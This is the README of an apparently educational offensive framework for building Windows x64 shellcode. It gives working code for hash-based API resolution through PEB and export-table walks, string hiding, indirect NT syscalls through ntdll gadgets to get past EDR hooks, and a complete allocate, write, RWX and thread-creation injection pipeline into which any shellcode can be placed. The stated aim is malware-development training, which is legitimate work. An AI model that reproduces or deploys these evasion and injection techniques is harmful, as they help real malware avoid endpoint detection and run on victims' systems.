a minimal, position-independent C shellcode micro framework for Windows x64.
compiles entirely on Linux with mingw-w64 and nasm. output is a flat raw binary (shellcode.bin) with no PE header, no imports, no CRT - ready to inject into any process.
designed for the course Malware Development for Ethical Hackers (2026).
a position-independent C shellcode framework that compiles entirely on Linux and produces flat raw bytes that survive injection into any Windows x64 process - with EDR-evading indirect NT syscalls baked in.
the four ideas that hold it together:
- write shellcode in C, not assembly: you write a normal sc_main(PVOID base) function. the framework handles PIC, base-address recovery, API resolution, and syscall dispatch. the asm is confined to a 20-line entry stub and 3-instruction syscall stubs generated by a macro.
- no PE header, no IAT, no CRT: output is a flat .bin blob starting at byte 0 with _start at offset 0. no imports - every Windows API is resolved at runtime by FNV-1a hash via PEB walk + EAT walk. no libc - STACKSTR builds strings on the stack so they never appear in .rdata.
- indirect syscalls that look clean on the call stack: instead of executing syscall ourselves (which leaves our shellcode as the return address - flagged by call-stack-aware EDRs), each stub jumps to the syscall; ret gadget that already exists inside ntdll's own stub, past the EDR's inline hook. the kernel sees a return address inside ntdll.
- linux-only toolchain: mingw-w64 + nasm + a custom linker script + objcopy. zero Windows dependency to build.
the framework is small enough to read end-to-end in one sitting (~500 lines of C + ~80 lines of NASM) and every component answers a specific detection problem:
- entry.asm - how does shellcode find its own base address? (RDIP)
- resolve.c - how do we call Windows APIs with no IAT? (PEB + EAT walk)
- pic.h - how do we avoid string IOCs? (FNV-1a hashes + STACKSTR)
- stubs.asm - how do we bypass EDR hooks on ntdll? (indirect syscalls)
- syscall.c - how do we get SSNs without hardcoding them? (runtime extraction)
- flat.ld - how do we produce raw bytes from a normal toolchain? (linker script + objcopy)
other projects either hide these mechanics behind code generators (SysWhispers) or are too big to study (Cobalt Strike). tabby is the minimum viable framework that makes each technique inspectable.
not a C2 or post-exploitation framework.
not a packer or crypter for existing PE files.
not a polished offensive tool - it's a teaching framework for "Malware Development for Ethical Hackers" trainings. the README documents the why of every design decision (the project structure rationale table) precisely because the goal is for the reader to understand the choices, not just run the binary.
before using this tool, you need to understand four ideas that the whole framework is built on. Each one is a direct answer to a specific detection problem.
a normal Windows EXE assumes it will be loaded at a fixed virtual address. the linker hard-codes absolute addresses for every function call, global variable, and string literal. If the code is copied somewhere else in memory and jumped into, those hard-coded addresses point to garbage and the process crashes.
shellcode must work regardless of where it lands in memory. Every reference to data or other code must be relative to the current instruction pointer.
on x86-64 this is mostly natural: CALL rel32 and LEA reg, [rip+N] are both RIP-relative by design. The problems are:
- strings and constants. the compiler normally puts them in .rdata at a fixed address. we merge .rdata into .text via the linker script, and build strings on the stack at runtime with the STACKSTR macro.
- global variables. the SSN slots and the gadget pointer must live somewhere the stubs can find them via [rel label]. we keep them in .text too; the linker script discards .data and .bss.
- _start at byte 0. the entry object is pinned first in the linker script so jumping to the first byte of shellcode.bin always lands in _start.
the entry stub (asm/entry.asm) uses a classic RDIP trick to recover its own load address:
```nasm
    call .here
.here:
    pop  rcx                     ; rcx = runtime address of .here
    sub  rcx, (.here - _start)   ; rcx = base of shellcode
```
this gives sc_main() a pointer to the shellcode's own base, useful if you embed a secondary payload or config block after the code.
every Windows API call in a normal program goes through the Import Address Table. the PE loader fills the IAT at load time by calling LoadLibrary and GetProcAddress on your behalf. A flat shellcode blob has no IAT. we have to find APIs ourselves.
the mechanism is a walk of the Process Environment Block (PEB):
```text
gs:[0x60] -> PEB
  └─ Ldr -> PEB_LDR_DATA
       └─ InLoadOrderModuleList (doubly-linked)
            ├─ ntdll.dll
            ├─ kernel32.dll
            └─ ...
```
every loaded DLL appears in this list with its base address and name. once we have a module base we walk its Export Address Table (EAT) - three parallel arrays of names, ordinals, and function RVAs - to find a specific export by name.
comparing strings at runtime is noisy and leaves IOCs. We compare hashes instead. The hash function is FNV-1a 32-bit (fast, good distribution, trivial to implement without a CRT):
```c
DWORD fnv1a(const char *s) {
    DWORD h = 0x811c9dc5;                              // FNV offset basis
    while (*s) { h ^= (BYTE)*s++; h *= 0x01000193; }   // xor byte, multiply by FNV prime
    return h;
}
```
pre-computed hash constants live in include/ntapi.h. use tools/hash.py to generate or verify them:
```text
$ python3 tools/hash.py NtAllocateVirtualMemory ntdll.dll
NtAllocateVirtualMemory -> 0xca67b978u
ntdll.dll -> 0xa62a3b3bu
```
DLL names are matched case-insensitively (lowercased in the LDR walk). export names are case-sensitive because the EAT preserves the original casing.
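for cross-checking constants outside the repo, the hash can be reproduced in a few lines of Python. this is a minimal sketch, not the contents of tools/hash.py: the function names and the lowercase flag are assumptions made for illustration. it follows the C routine above (same offset basis and prime) and masks to 32 bits, because Python integers do not wrap the way a DWORD does.

```python
FNV_OFFSET_BASIS = 0x811C9DC5  # same start value as the C fnv1a()
FNV_PRIME = 0x01000193         # same multiplier as the C fnv1a()


def fnv1a32(name: str, lowercase: bool = False) -> int:
    """32-bit FNV-1a over the ASCII bytes of name.

    lowercase=True is a hypothetical switch that mimics the
    case-insensitive DLL-name matching described above.
    """
    if lowercase:
        name = name.lower()
    h = FNV_OFFSET_BASIS
    for byte in name.encode("ascii"):
        h ^= byte
        h = (h * FNV_PRIME) & 0xFFFFFFFF  # emulate DWORD wrap-around
    return h


def as_c_constant(name: str, lowercase: bool = False) -> str:
    """Format the hash the way the header constants are written (0x........u)."""
    return f"0x{fnv1a32(name, lowercase):08x}u"


if __name__ == "__main__":
    for export in ("NtAllocateVirtualMemory", "NtClose"):
        print(export, "->", as_c_constant(export))
    print("ntdll.dll ->", as_c_constant("NTDLL.DLL", lowercase=True))
```

hash export names with lowercase left off and module names with it on, so that a module listed as NTDLL.DLL and one listed as ntdll.dll produce the same constant.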
calling NtAllocateVirtualMemory from our shellcode in the normal way (call the ntdll export) is visible to any EDR that hooks ntdll. the EDR installs an inline hook - it overwrites the first bytes of the ntdll stub with a JMP into the EDR's own code, which inspects the call before letting it proceed.
Direct syscalls bypass the hook by putting the system call number (SSN) into EAX and executing syscall ourselves:
```nasm
mov eax, 0x18      ; SSN for NtAllocateVirtualMemory
mov r10, rcx       ; NT ABI: r10 must mirror rcx
syscall
```
this dodges the hook, but creates a new problem: the thread call stack shows our_shellcode+N -> NtAllocateVirtualMemory. call-stack-aware EDRs flag any syscall whose return address is not inside ntdll.
indirect syscalls fix this. Instead of executing syscall ourselves, we jump to the syscall; ret instruction that already exists inside ntdll's own stub - past the hook:
```text
ntdll!NtAllocateVirtualMemory:
  4C 8B D1          mov r10, rcx     <- hook overwrites here
  B8 18 00 00 00    mov eax, 0x18
  0F 05             syscall          <- we jump to here
  C3                ret
```
now the return address that the kernel sees is inside ntdll. The call stack looks clean.
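the SSN is extracted at runtime by scanning the ntdll stub for the mov eax, imm32 opcode (0xB8). this keeps working on a hooked stub as long as the hook only overwrites the leading mov r10, rcx bytes and leaves the mov eax bytes further down intact. a hook long enough to cover the 0xB8 byte (for example a 5-byte jmp rel32 at offset 0, which spans the 3-byte mov r10, rcx plus the next 2 bytes) defeats the scan for that stub: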
```c
static DWORD extract_ssn(PBYTE stub) {
    for (int i = 0; i < 32; i++) {
        if (stub[i] == 0xB8) {                        // mov eax, imm32
            DWORD ssn = *(DWORD *)(stub + i + 1);
            if (ssn < 0x600) return ssn;              // sanity: no NT SSN is >= 0x600
        }
    }
    return (DWORD)-1;                                 // not found
}
```
a Windows PE is compiled for Windows but the compilation itself is just translating C source and ASM to machine code. mingw-w64 is a complete win64 cross-compiler that runs on Linux and produces native Windows COFF object files and PE executables.
the flat binary extraction step uses objcopy to peel the .text section out of the PE wrapper:
```text
C source  -> x86_64-w64-mingw32-gcc     -> Win64 COFF .o
ASM       -> nasm -f win64              -> Win64 COFF .o
COFF .o   -> x86_64-w64-mingw32-ld      -> PE .elf (single .text section)
PE .elf   -> x86_64-w64-mingw32-objcopy -> shellcode.bin (raw bytes)
```
nothing in this pipeline touches Windows. the output runs on Windows because the machine code is win64 ABI compliant.
```text
tabby/
├── include/
│   ├── types.h       windows types from scratch - no SDK, no CRT headers
│   ├── pic.h         FNV-1a hash, STACKSTR macro, GETAPI helper, module hashes
│   └── ntapi.h       NT function pointer types, sc_* declarations, hash constants
├── src/
│   ├── crt.c         sc_memcpy / sc_memset / sc_memcmp / sc_strlen
│   ├── resolve.c     find_module (PEB walk) + resolve_export (EAT walk) + find_syscall_gadget
│   └── syscall.c     SSN extraction + syscall_init()
├── asm/
│   ├── entry.asm     _start at byte 0: RDIP -> sc_main(base)
│   └── stubs.asm     SSN slots + g_syscall_gadget + indirect syscall stubs (8 NT functions)
├── ld/
│   └── flat.ld       linker script: flatten .text and .rdata$* into single .text at offset 0
├── example/
│   ├── exec.c        minimal demo: PEB walk -> kernel32 -> WinExec("calc.exe")
│   └── alloc_exec.c  full demo: syscall init -> NtAlloc -> NtWrite -> NtProtect RWX -> NtCreateThreadEx
└── tools/
    ├── hash.py       FNV-1a pre-computation for ntapi.h constants
    └── loader.c      minimal Win64 test loader: maps shellcode.bin and executes it
```
install on Ubuntu / Debian:
```sh
sudo apt install mingw-w64 nasm binutils-mingw-w64-x86-64
```
that is all. no MSVC, no Windows SDK, no Wine.
```sh
git clone https://github.com/cocomelonc/tabby
cd tabby
make
```
expected output:
```text
nasm -f win64 -I include/ asm/entry.asm -o obj/entry.o
nasm -f win64 -I include/ asm/stubs.asm -o obj/stubs.o
x86_64-w64-mingw32-gcc ... -c src/crt.c -o obj/crt.o
x86_64-w64-mingw32-gcc ... -c src/resolve.c -o obj/resolve.o
x86_64-w64-mingw32-gcc ... -c src/syscall.c -o obj/syscall.o
x86_64-w64-mingw32-gcc ... -c example/alloc_exec.c -o obj/alloc_exec.o
x86_64-w64-mingw32-ld -T ld/flat.ld --gc-sections -o bin/shellcode.elf ...
x86_64-w64-mingw32-objcopy --only-section=.text -O binary ...
[=^..^=] shellcode.bin 1760 bytes
```
the only warning (section below image base) is expected - we intentionally place .text at virtual address 0 so the flat binary starts at byte 0.
output: bin/shellcode.bin - a raw x64 shellcode blob.
a smaller standalone test shellcode (PEB walk + WinExec only, no indirect NT syscalls) is also available:
```sh
make exec    # produces bin/exec.bin (~416 bytes)
```
useful for sanity-checking the framework on a new target before exercising the full NT syscall path.
disassemble the first bytes on Linux to confirm _start is at offset 0:
```sh
ndisasm -b 64 bin/shellcode.bin | head -20
```
expected:
```text
00000000  53              push rbx
00000001  57              push rdi
00000002  56              push rsi
00000003  4883EC20        sub rsp,byte +0x20    ; shadow space, preserves 16-byte alignment
00000007  E800000000      call 0xc
0000000C  59              pop rcx               ; <- RDIP trick
0000000D  4883E90C        sub rcx,byte +0xc     ; rcx = base of shellcode
00000011  E8XXXXXXXX      call sc_main
...
0000001E  6690            xchg ax,ax            ; padding to 0x20
00000020  0000            ssn_NtAllocateVirtualMemory (dd 0, populated at runtime)
00000024  0000            ssn_NtWriteVirtualMemory
...
00000040  0000            g_syscall_gadget (dq 0)
00000048  8B0500000000    mov eax,[rel ssn_NtAllocateVirtualMemory]   ; <- first syscall stub
```
the RDIP sequence at 0x07–0x0D is the canonical PIC base-address recovery.
SSN slots and the gadget pointer live in .text (offsets 0x20–0x47) so they survive the objcopy --only-section=.text extraction and remain reachable via RIP-relative addressing at any load address.
the first syscall stub starts at 0x48.
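the offsets in that listing follow from simple arithmetic, which the sketch below reproduces so you can recompute them after adding a stub. it is an illustration only: the helper names are made up here, and the slot order beyond the first two entries is assumed to match the order of the stub table in this README (the real order is whatever asm/stubs.asm declares).

```python
SSN_SLOT_SIZE = 4   # each SSN slot is a NASM `dd 0`
GADGET_SIZE = 8     # g_syscall_gadget is a NASM `dq 0`
SLOTS_BASE = 0x20   # the entry stub is padded up to this offset

# Assumed order: only the first two names are confirmed by the disassembly.
STUB_NAMES = [
    "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
    "NtProtectVirtualMemory", "NtFreeVirtualMemory",
    "NtCreateThreadEx", "NtWaitForSingleObject",
    "NtClose", "NtTerminateProcess",
]


def data_layout(names=STUB_NAMES, base=SLOTS_BASE):
    """Return {label: offset} for the SSN slots, gadget pointer and first stub."""
    offsets = {f"ssn_{n}": base + i * SSN_SLOT_SIZE for i, n in enumerate(names)}
    gadget = base + len(names) * SSN_SLOT_SIZE
    offsets["g_syscall_gadget"] = gadget
    offsets["first_stub"] = gadget + GADGET_SIZE
    return offsets


def rdip_delta(call_offset=0x07, call_len=5):
    """Offset of .here from _start: the CALL pushes the address that follows it."""
    return call_offset + call_len


if __name__ == "__main__":
    for label, off in data_layout().items():
        print(f"{off:#06x}  {label}")
    print(f"sub rcx, {rdip_delta():#x}")
```

with eight stubs the slots occupy 0x20-0x3f, the gadget pointer 0x40-0x47, and the first stub lands at 0x48, matching the disassembly. a ninth 4-byte slot would move the gadget pointer to 0x44 unless the source aligns it.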
bin/shellcode.bin is a raw byte blob - not an executable. to run it on Windows you need a loader: a normal Win32 program that maps the blob into memory and jumps into it.
on Linux, cross-compile tools/loader.c with:
```sh
make loader
```
this produces bin/loader.exe using mingw-w64 - no Windows required.
copy both files to the same folder on the Windows machine:
```text
bin/shellcode.bin
bin/loader.exe
```
then run the loader with the blob as its argument:
```text
.\loader.exe shellcode.bin
```
or, to test the smaller standalone shellcode first:
```text
.\loader.exe exec.bin
```
both pop calc.exe. the difference is that exec.bin calls WinExec directly (PEB walk + EAT walk only), while shellcode.bin does the full indirect-NT-syscall injection pipeline (NtAllocateVirtualMemory -> NtWriteVirtualMemory -> NtProtectVirtualMemory -> NtCreateThreadEx) with exec.bin's bytes as the embedded payload.
if exec.bin pops calc but shellcode.bin does not, the bug is somewhere in the indirect-syscall path (SSN extraction, gadget address, stub calling convention, or NtCreateThreadEx arguments) - not the framework basics.
```text
fopen("shellcode.bin", "rb")            // reads the raw bytes
VirtualAlloc(NULL, sz, RW)              // allocates a private RW region
fread -> buf                            // copies shellcode in
VirtualProtect(buf, sz, RWX)            // flips the region to execute-read-write
CreateThread(buf)                       // spawns a thread at byte 0
WaitForSingleObject(thread, INFINITE)   // waits for shellcode to return
VirtualFree + CloseHandle               // cleans up
```
the region is mapped RWX (not RX) because syscall_init() writes the extracted SSN values into the shellcode's own .text section at runtime. without write access the first store would #AV and the thread would terminate silently.
the loader prints the load address before jumping so you can attach a debugger at the right offset if needed:
```text
[=^..^=] loaded 1760 bytes from shellcode.bin
[=^..^=] executing at 0x000001A2B3C40000
```
the bundled example payload (example/alloc_exec.c) spawns calc.exe:
- allocates a fresh RW region via NtAllocateVirtualMemory (indirect syscall)
- writes an embedded mini-shellcode (PAYLOAD[] = example/exec.c compiled output: PEB walk -> WinExec("calc.exe"))
- flips the region to RWX via NtProtectVirtualMemory
- spawns a thread on it via NtCreateThreadEx
- waits for the thread, closes the handle, frees the region
swap PAYLOAD[] with any position-independent x64 shellcode and rebuild with make.
- copy example/alloc_exec.c or example/exec.c as a starting template, or create a new file in example/.
- write a sc_main(PVOID base) function. if you call any sc_Nt* stub, call syscall_init(ntdll) first. base is the runtime address of byte 0 of your shellcode, useful if you embed config or a secondary payload after the code.
- add a build rule for your .c file in Makefile and list its .o in C_OBJS (or replace alloc_exec.o).
- run make (or make exec for a variant that excludes the syscall stubs entirely).
```c
PVOID ntdll    = find_module(H_NTDLL);
PVOID kernel32 = find_module(H_KERNEL32);
```
to resolve any export by name:
```c
typedef HANDLE (*GetStdHandle_t)(DWORD);
GetStdHandle_t pGetStdHandle = (GetStdHandle_t) resolve_export(kernel32, H_GetStdHandle);
```
or with the GETAPI macro:
```c
HANDLE h = GETAPI(H_KERNEL32, H_GetStdHandle, GetStdHandle_t)(STD_OUTPUT_HANDLE);
```
after syscall_init(ntdll), call the sc_Nt* functions exactly like the real NT API:
```c
PVOID  region = NULL;
SIZE_T size   = 4096;
NTSTATUS st = sc_NtAllocateVirtualMemory(
    (HANDLE)-1,                 // current process
    &region,
    0,
    &size,
    MEM_COMMIT | MEM_RESERVE,
    PAGE_READWRITE);
if (!NT_SUCCESS(st)) { /* handle error */ }
```
available stubs:
| function | args | notes |
|---|---|---|
| sc_NtAllocateVirtualMemory | 6 | allocate memory in a process |
| sc_NtWriteVirtualMemory | 5 | write across process boundary |
| sc_NtProtectVirtualMemory | 5 | change page protection |
| sc_NtFreeVirtualMemory | 4 | release allocation |
| sc_NtCreateThreadEx | 11 | spawn thread in local or remote process |
| sc_NtWaitForSingleObject | 3 | wait on a handle |
| sc_NtClose | 1 | close a handle |
| sc_NtTerminateProcess | 2 | terminate a process |
do not write:
```c
const char *msg = "hello";   // ends up in .rdata -> fixed address -> crash
```
use STACKSTR instead:
```c
STACKSTR(msg, "hello");      // pushed onto the stack character by character
```
step 1 - add the SSN slot and stub to asm/stubs.asm (slot lives in .text, not .bss, so it survives flat-binary extraction):
```nasm
global ssn_NtOpenProcess
ssn_NtOpenProcess: dd 0
STUB NtOpenProcess, ssn_NtOpenProcess
```
the STUB macro is a single, ABI-clean stub - no argument shifting needed for any number of arguments because the Win64 calling convention already places args 5+ at [rsp+28h], exactly where the kernel reads them.
step 2 - declare the SSN extern and add the LOAD_SSN call inside src/syscall.c:
```c
extern DWORD ssn_NtOpenProcess;
...
LOAD_SSN(ssn_NtOpenProcess, H_NtOpenProcess);
```
step 3 - add the hash constant to include/ntapi.h:
```c
#define H_NtOpenProcess 0xXXXXXXXXu
```
compute it:
```sh
python3 tools/hash.py NtOpenProcess
```
step 4 - declare the prototype in include/ntapi.h:
```c
NTSTATUS sc_NtOpenProcess(HANDLE *, DWORD, OBJECT_ATTRIBUTES *, CLIENT_ID *);
```
take sc_NtAllocateVirtualMemory as the example. the caller in C is:
```c
sc_NtAllocateVirtualMemory((HANDLE)-1, &region, 0, &size, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);
```
win64 calling convention maps this to:
```text
RCX        = (HANDLE)-1
RDX        = &region
R8         = 0
R9         = &size
[RSP+0x28] = MEM_COMMIT|MEM_RESERVE   <- 5th arg on stack
[RSP+0x30] = PAGE_READWRITE           <- 6th arg on stack
```
inside the stub:
```nasm
sc_NtAllocateVirtualMemory:
    mov eax, dword [rel ssn_NtAllocateVirtualMemory]   ; EAX <- SSN
    mov r10, rcx                                       ; R10 <- RCX (NT ABI)
    jmp qword [rel g_syscall_gadget]
```
three instructions. that's it. the stub does not touch the stack, does not shift arguments, and does not modify RSP. the Win64 calling convention already places args 5+ at [rsp+28h], [rsp+30h], ... and the kernel reads them from those exact offsets after syscall. nothing extra to do.
at the point of JMP, the register and stack state is:
```text
EAX        = SSN
R10        = (HANDLE)-1               <- arg 1 (kernel reads R10, not RCX, after syscall)
RDX        = &region                  <- arg 2
R8         = 0                        <- arg 3
R9         = &size                    <- arg 4
[RSP+0x28] = MEM_COMMIT|MEM_RESERVE   <- arg 5
[RSP+0x30] = PAGE_READWRITE           <- arg 6
```
the JMP lands at the syscall; ret bytes inside ntdll's own NtAllocateVirtualMemory stub, past any EDR hook. the kernel executes the syscall and resumes at the ret that follows it inside ntdll, and that ret returns to our C caller. the address that the kernel and any call-stack scanner observe as the origin of the syscall is inside ntdll - not inside our shellcode.
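the argument placement used in the walk-through above is the general Win64 rule for integer and pointer arguments, so the slot for any argument of a longer call (NtCreateThreadEx takes 11) can be computed rather than memorised. the helper below is a hypothetical illustration, not part of the framework. offsets are relative to RSP at function entry, where [RSP] holds the return address and [RSP+0x08]..[RSP+0x27] is the 32-byte shadow space.

```python
REGISTER_ARGS = ("RCX", "RDX", "R8", "R9")  # integer/pointer args 1-4
RETURN_ADDRESS_SIZE = 8                     # pushed by CALL
SHADOW_SPACE_SIZE = 0x20                    # home space for the 4 register args
SLOT_SIZE = 8                               # every stack argument takes 8 bytes


def win64_arg_location(index: int) -> str:
    """Where the callee finds integer/pointer argument `index` (1-based) on entry."""
    if index < 1:
        raise ValueError("argument index is 1-based")
    if index <= len(REGISTER_ARGS):
        return REGISTER_ARGS[index - 1]
    offset = (RETURN_ADDRESS_SIZE + SHADOW_SPACE_SIZE
              + SLOT_SIZE * (index - len(REGISTER_ARGS) - 1))
    return f"[RSP+0x{offset:02x}]"


if __name__ == "__main__":
    for i in range(1, 12):  # the 11 arguments of NtCreateThreadEx
        print(f"arg {i:2d} -> {win64_arg_location(i)}")
```

because the stub jumps instead of calling, RSP is unchanged between stub entry and the syscall instruction, so these offsets are still valid when the kernel reads the arguments; the only fix-up is copying RCX into R10.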
the example/alloc_exec.c demo ships with the compiled bytes of example/exec.c (PEB walk -> WinExec("calc.exe")) as PAYLOAD[]. To use your own:
```c
static const BYTE PAYLOAD[] = {
    // paste your x64 shellcode bytes here
    0x48, 0x31, 0xc0, ...
};
```
regenerate the bytes from a fresh make exec build:
```sh
make exec
python3 -c "
data = open('bin/exec.bin','rb').read()
for i in range(0, len(data), 12):
    print('    ' + ', '.join(f'0x{b:02x}' for b in data[i:i+12]) + ',')
"
```
or generate shellcode with any external framework (msfvenom, donut, your own) and paste the byte array.
the framework handles allocation, write, protection flip, and thread creation - you only need to provide the bytes.
| decision | reason |
|---|---|
| -nostdlib -nostdinc -ffreestanding | zero CRT dependency; everything in the binary came from our own source |
| -fno-builtin | prevents GCC emitting implicit memcpy/memset calls to CRT |
| -mno-red-zone | Win64 does not honour the System V red zone; without this, signal delivery or asynchronous callbacks can corrupt our stack frame |
| -mcmodel=small | critical: forces direct IMAGE_REL_AMD64_REL32 relocations for global symbol access. without it, mingw64 emits .refptr.<sym> indirection through .rdata that holds the absolute link-time VMA. for our flat binary with . = 0 that VMA is meaningless at runtime; every SSN store would crash with #AV |
| -fno-asynchronous-unwind-tables | suppresses .eh_frame generation; we discard it anyway but this avoids linker noise |
| -ffunction-sections -fdata-sections + ld --gc-sections | dead-code elimination: drops unused symbols (e.g. sc_memcpy if no STACKSTR is large enough to need it) so the binary contains only what's actually called |
| -Os | size optimisation keeps shellcode small; also discourages the compiler from emitting CRT helper calls |
| nasm -f win64 | produces Win64 COFF objects compatible with mingw-w64-ld; full access to NASM macros for clean stub generation |
| SSN slots in .text (via NASM dd 0) | mingw64 places C globals in .bss, which our linker script discards. defining the slots in NASM's .text section guarantees they survive objcopy --only-section=.text and the stubs' [rel ssn_*] displacements resolve correctly |
| linker script at . = 0 + .rdata$* .text$* merged into .text | lets objcopy --only-section=.text produce a flat binary starting at offset 0 with no PE overhead; the $* wildcards catch COFF section groups emitted by -ffunction-sections/-fdata-sections |
| entry stub sub rsp, 0x20 (not 0x28) | after push rbx/rdi/rsi the stack is already 16-aligned. sub rsp, 0x20 (32, a multiple of 16) preserves alignment so sc_main receives the Win64-ABI-correct RSP mod 16 = 8. otherwise an aligned SSE access such as MOVAPS inside any Windows DLL (e.g. CreateProcess inside WinExec) faults with #GP on the misaligned stack and the thread dies silently |
| FNV-1a over CRC32 | equally fast, no special instructions required, fits in 6 lines of C |
| per-function SSN slots | avoids a generic do_syscall(ssn, ...) wrapper that would need to shift a variable number of stack arguments; each stub has the exact Win64 signature the kernel expects |
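the alignment argument in the entry-stub row can be checked with modular arithmetic. the sketch below is an illustration only (the function name and parameters are made up here). it assumes _start is reached by a normal CALL, so RSP mod 16 is 8 on entry, and tracks RSP mod 16 through the three pushes, the frame allocation, and the call into sc_main.

```python
def rsp_mod16_trace(frame_size: int, pushes: int = 3, entry_mod16: int = 8):
    """Return (RSP mod 16 just before `call sc_main`, RSP mod 16 on entry to sc_main)."""
    rsp = entry_mod16          # only the value modulo 16 matters
    rsp -= 8 * pushes          # push rbx / push rdi / push rsi
    rsp -= frame_size          # sub rsp, frame_size
    before_call = rsp % 16
    rsp -= 8                   # CALL pushes the return address
    return before_call, rsp % 16


if __name__ == "__main__":
    for frame in (0x20, 0x28):
        before, inside = rsp_mod16_trace(frame)
        print(f"sub rsp, {frame:#x}: before call = {before}, in sc_main = {inside}")
```

with 0x20 the stack is 16-aligned at the call and sc_main starts at RSP mod 16 = 8, as the ABI expects. with 0x28 both values are off by 8, which is the misalignment the table warns about.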
this tool is a proof of concept for educational purposes only. the author takes no responsibility for any damage caused by misuse.










